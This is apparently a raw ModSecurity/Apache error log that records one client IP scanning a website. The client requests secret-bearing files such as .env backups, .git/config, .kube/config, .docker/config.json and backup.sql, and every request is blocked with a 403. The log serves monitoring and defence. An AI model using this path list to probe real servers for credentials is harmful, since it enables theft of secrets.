[Sat Dec 13 14:35:48.480847 2025] [:error] [pid 714714] [client 62.60.131.73:59093] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aT1rtAGjewIfvkGPhVURkQAAAAs"]
[Sat Dec 13 14:35:48.481055 2025] [:error] [pid 714714] [client 62.60.131.73:59093] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aT1rtAGjewIfvkGPhVURkQAAAAs"]
[Sat Dec 13 14:35:48.481230 2025] [:error] [pid 714714] [client 62.60.131.73:59093] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aT1rtAGjewIfvkGPhVURkQAAAAs"]
[Sat Dec 13 14:35:48.567107 2025] [:error] [pid 714714] [client 62.60.131.73:57243] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.gitlab-ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci/.env"] [unique_id "aT1rtAGjewIfvkGPhVURkgAAAAs"]
[Sat Dec 13 14:35:48.567411 2025] [:error] [pid 714714] [client 62.60.131.73:57243] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci/.env"] [unique_id "aT1rtAGjewIfvkGPhVURkgAAAAs"]
[Sat Dec 13 14:35:48.567643 2025] [:error] [pid 714714] [client 62.60.131.73:57243] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci/.env"] [unique_id "aT1rtAGjewIfvkGPhVURkgAAAAs"]
[Sat Dec 13 14:35:50.504143 2025] [:error] [pid 704254] [client 62.60.131.73:53831] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT1rtuwlqSNWTqzM15TLeAAAAAU"]
[Sat Dec 13 14:35:50.504351 2025] [:error] [pid 704254] [client 62.60.131.73:53831] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT1rtuwlqSNWTqzM15TLeAAAAAU"]
[Sat Dec 13 14:35:50.504531 2025] [:error] [pid 704254] [client 62.60.131.73:53831] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT1rtuwlqSNWTqzM15TLeAAAAAU"]
[Sat Dec 13 14:35:50.510139 2025] [:error] [pid 713376] [client 62.60.131.73:60377] [client 62.60.131.73] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aT1rtsMCdDiVaVxx7rzS5gAAAAg"]
[Sat Dec 13 14:35:50.510281 2025] [:error] [pid 713376] [client 62.60.131.73:60377] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aT1rtsMCdDiVaVxx7rzS5gAAAAg"]
[Sat Dec 13 14:35:50.510471 2025] [:error] [pid 713376] [client 62.60.131.73:60377] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aT1rtsMCdDiVaVxx7rzS5gAAAAg"]
[Sat Dec 13 14:35:50.510626 2025] [:error] [pid 713376] [client 62.60.131.73:60377] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aT1rtsMCdDiVaVxx7rzS5gAAAAg"]
[Sat Dec 13 14:35:50.615479 2025] [:error] [pid 714724] [client 62.60.131.73:60266] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.mail"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.mail"] [unique_id "aT1rtpByUfSYTqkGkJPP7QAAABU"]
[Sat Dec 13 14:35:50.615659 2025] [:error] [pid 714724] [client 62.60.131.73:60266] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.mail"] [unique_id "aT1rtpByUfSYTqkGkJPP7QAAABU"]
[Sat Dec 13 14:35:50.615818 2025] [:error] [pid 714724] [client 62.60.131.73:60266] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.mail"] [unique_id "aT1rtpByUfSYTqkGkJPP7QAAABU"]
[Sat Dec 13 14:35:50.645086 2025] [:error] [pid 704254] [client 62.60.131.73:58815] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aT1rtuwlqSNWTqzM15TLeQAAAAU"]
[Sat Dec 13 14:35:50.645370 2025] [:error] [pid 704254] [client 62.60.131.73:58815] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aT1rtuwlqSNWTqzM15TLeQAAAAU"]
[Sat Dec 13 14:35:50.645553 2025] [:error] [pid 704254] [client 62.60.131.73:58815] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aT1rtuwlqSNWTqzM15TLeQAAAAU"]
[Sat Dec 13 14:35:50.645602 2025] [:error] [pid 714720] [client 62.60.131.73:62718] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aT1rtq4VNj31t3YxnCv54AAAABE"]
[Sat Dec 13 14:35:50.645831 2025] [:error] [pid 714720] [client 62.60.131.73:62718] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aT1rtq4VNj31t3YxnCv54AAAABE"]
[Sat Dec 13 14:35:50.646011 2025] [:error] [pid 714720] [client 62.60.131.73:62718] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aT1rtq4VNj31t3YxnCv54AAAABE"]
[Sat Dec 13 14:35:50.886997 2025] [:error] [pid 714712] [client 62.60.131.73:59776] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/tsconfig.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /tsconfig.json found within REQUEST_FILENAME: /api/config/tsconfig.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/config/tsconfig.json"] [unique_id "aT1rtiTMOdrVkGQ5T32MlwAAAAk"]
[Sat Dec 13 14:35:50.887186 2025] [:error] [pid 714712] [client 62.60.131.73:59776] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/config/tsconfig.json"] [unique_id "aT1rtiTMOdrVkGQ5T32MlwAAAAk"]
[Sat Dec 13 14:35:50.887362 2025] [:error] [pid 714712] [client 62.60.131.73:59776] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/config/tsconfig.json"] [unique_id "aT1rtiTMOdrVkGQ5T32MlwAAAAk"]
[Sat Dec 13 14:35:50.937946 2025] [:error] [pid 704367] [client 62.60.131.73:53631] [client 62.60.131.73] ModSecurity: Warning. Matched phrase ".profile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .profile found within REQUEST_FILENAME: /.profile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.profile"] [unique_id "aT1rtos5xwzJRmvoJuRc4QAAAAY"]
[Sat Dec 13 14:35:50.938160 2025] [:error] [pid 704367] [client 62.60.131.73:53631] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.profile"] [unique_id "aT1rtos5xwzJRmvoJuRc4QAAAAY"]
[Sat Dec 13 14:35:50.938365 2025] [:error] [pid 704367] [client 62.60.131.73:53631] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.profile"] [unique_id "aT1rtos5xwzJRmvoJuRc4QAAAAY"]
[Sat Dec 13 14:35:51.053745 2025] [:error] [pid 714712] [client 62.60.131.73:52626] [client 62.60.131.73] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.kube/config"] [unique_id "aT1rtyTMOdrVkGQ5T32MmAAAAAk"]
[Sat Dec 13 14:35:51.053965 2025] [:error] [pid 714712] [client 62.60.131.73:52626] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.kube/config"] [unique_id "aT1rtyTMOdrVkGQ5T32MmAAAAAk"]
[Sat Dec 13 14:35:51.054140 2025] [:error] [pid 714712] [client 62.60.131.73:52626] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.kube/config"] [unique_id "aT1rtyTMOdrVkGQ5T32MmAAAAAk"]
[Sat Dec 13 14:35:51.446860 2025] [:error] [pid 714728] [client 62.60.131.73:58034] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aT1rt_NFKqZsdSbfeU1GmQAAABk"]
[Sat Dec 13 14:35:51.447139 2025] [:error] [pid 714728] [client 62.60.131.73:58034] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aT1rt_NFKqZsdSbfeU1GmQAAABk"]
[Sat Dec 13 14:35:51.449186 2025] [:error] [pid 714728] [client 62.60.131.73:58034] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aT1rt_NFKqZsdSbfeU1GmQAAABk"]
[Sat Dec 13 14:35:51.498887 2025] [authz_core:error] [pid 714737] [client 62.60.131.73:50228] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/config.php
[Sat Dec 13 14:35:51.523944 2025] [:error] [pid 714728] [client 62.60.131.73:55466] [client 62.60.131.73] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aT1rt_NFKqZsdSbfeU1GmgAAABk"]
[Sat Dec 13 14:35:51.524137 2025] [:error] [pid 714728] [client 62.60.131.73:55466] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aT1rt_NFKqZsdSbfeU1GmgAAABk"]
[Sat Dec 13 14:35:51.524290 2025] [:error] [pid 714728] [client 62.60.131.73:55466] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aT1rt_NFKqZsdSbfeU1GmgAAABk"]
[Sat Dec 13 14:35:51.609770 2025] [authz_core:error] [pid 714739] [client 62.60.131.73:50052] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/run
[Sat Dec 13 14:35:51.681194 2025] [authz_core:error] [pid 714739] [client 62.60.131.73:53797] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/run
[Sat Dec 13 14:35:52.496790 2025] [:error] [pid 714745] [client 62.60.131.73:61340] [client 62.60.131.73] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "aT1ruK7he51rbo1RuLjq1wAAACo"]
